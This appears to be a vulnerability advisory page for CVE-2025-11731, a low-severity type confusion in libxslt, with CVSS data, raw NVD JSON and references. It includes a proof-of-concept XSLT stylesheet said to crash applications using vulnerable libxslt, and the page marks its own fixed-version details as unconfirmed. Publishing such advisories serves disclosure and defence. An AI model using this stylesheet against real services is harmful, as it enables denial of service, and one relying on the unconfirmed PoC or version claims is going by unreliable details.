Security Vulnerability Report
CVE-2025-11731 CVSS 3.1 LOW

CVE-2025-11731

Published: 2025-10-14 06:15:34
Last Modified: 2026-04-27 21:16:23

Description

A flaw was found in the exsltFuncResultComp() function of libxslt, which handles EXSLT <func:result> elements during stylesheet parsing. Due to improper type handling, the function may treat an XML document node as a regular XML element node, resulting in a type confusion. This can cause unexpected memory reads and potential crashes. While difficult to exploit, the flaw could lead to application instability or denial of service.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

libxslt < 1.1.43 (exact fixed version to be confirmed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- CVE-2025-11731 PoC: Type confusion in exsltFuncResultComp() -->
<!-- This XSLT stylesheet triggers type confusion by making func:result -->
<!-- return a document node instead of an element node -->
<!-- xmlns:my below is a placeholder namespace URI, declared so that the
     my: prefix used by the function name resolves -->
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:func="http://exslt.org/functions"
    xmlns:exsl="http://exslt.org/common"
    xmlns:my="urn:example:my"
    extension-element-prefixes="func exsl">

  <func:function name="my:trigger">
    <!-- func:result returns a document node (exsl:node-set result wrapped
         as document), which causes type confusion in exsltFuncResultComp() -->
    <func:result select="exsl:node-set(/*)" />
  </func:function>

  <xsl:template match="/">
    <root>
      <xsl:value-of select="my:trigger()" />
    </root>
  </xsl:template>

</xsl:stylesheet>
<!-- Usage: Apply this stylesheet to any XML document using xsltproc or any
     application linked against vulnerable libxslt.
     Expected result: Crash (segfault) or unexpected memory read. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11731", "sourceIdentifier": "[email protected]", "published": "2025-10-14T06:15:34.483", "lastModified": "2026-04-27T21:16:22.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the exsltFuncResultComp() function of libxslt, which handles EXSLT <func:result> elements during stylesheet parsing. Due to improper type handling, the function may treat an XML document node as a regular XML element node, resulting in a type confusion. This can cause unexpected memory reads and potential crashes. While difficult to exploit, the flaw could lead to application instability or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:11015", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-11731", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403688", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/151", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libxslt/-/merge_requests/78", "source": "[email protected]"}]}}